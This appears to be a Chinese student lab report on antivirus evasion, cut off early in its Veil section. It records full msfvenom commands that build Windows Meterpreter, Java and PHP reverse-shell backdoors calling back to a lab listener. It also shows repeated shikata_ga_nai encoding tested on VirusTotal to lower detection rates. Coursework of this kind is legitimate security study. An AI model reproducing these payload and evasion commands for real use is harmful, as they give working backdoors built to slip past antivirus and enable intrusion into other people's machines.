1.实验内容
实践内容
(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
veil,加壳工具
使用C + shellcode编程
(2)通过组合应用各种技术实现恶意代码免杀
如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。
(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
实验要求
掌握免杀原理与技术
回答问题
(1)杀软是如何检测出恶意代码的?
(2)免杀是做什么?
(3)免杀的基本方法有哪些?
2.实验过程
一.正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
1.正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
在kali虚拟机上使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.134 LPORT=2428 -f exe > 20232428.exe命令生成
这个命令的作用是生成一个 Windows 系统的恶意程序,具体来说:
用msfvenom工具制作,类型是能反向连接的Meterpreter后门;
目标运行后会主动连接192.168.80.134这个 IP 的2428端口;
生成的文件名叫20232428.exe,格式是 Windows 可执行文件。
2.通过共享文件夹分享至主机文件夹中并上传至VirusTota观察结果
3.(1)使用msf编码器多次迭代,生成exe文件
在kali中使用如下命令, msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.80.134 LPORT=2428 -f exe > 20232428_encoded.exe
传输到主机上检测结果如下
多次编码后尝试,使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.80.134 LPORT=2428 -f exe > 20232428_encoded_10x.exe命令生成文件,上传检测,结果如下
前后对比下降并不明显,说明免杀效果并不理想。
(2)生成jar格式的后门文件
使用msfvenom -p java/shell_reverse_tcp LHOST=192.168.80.134 LPORT=2428 -f jar > 20232428_java_rev.jar命令生成jar文件,上传至主机并检测
效果明显
(3)使用msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.134 LPORT=2428 -o 20232428_php_rev.php命令生成文件并上传
2.使用veil,加壳工具
问题(1)第一次使用命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.134 LPORT=2428 -f php > 20232428_php_rev.php,Kali 系统中执行msfvenom命令生成 PHP 格式的反向连接载荷时,遇到了 “invalid format: php” 的错误。这是因为msfvenom中生成 PHP 类型载荷时,格式参数并非-f php,而是需要调整命令结构。使用以下命令来生成 PHP 反向连接载荷msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.134 LPORT=2428 -o 20232428_php_rev.php这里将-f php替换为-o 20232428_php_rev.php,通过-o参数直接指定输出文件,即可生成符合要求的 PHP 反向连接脚本。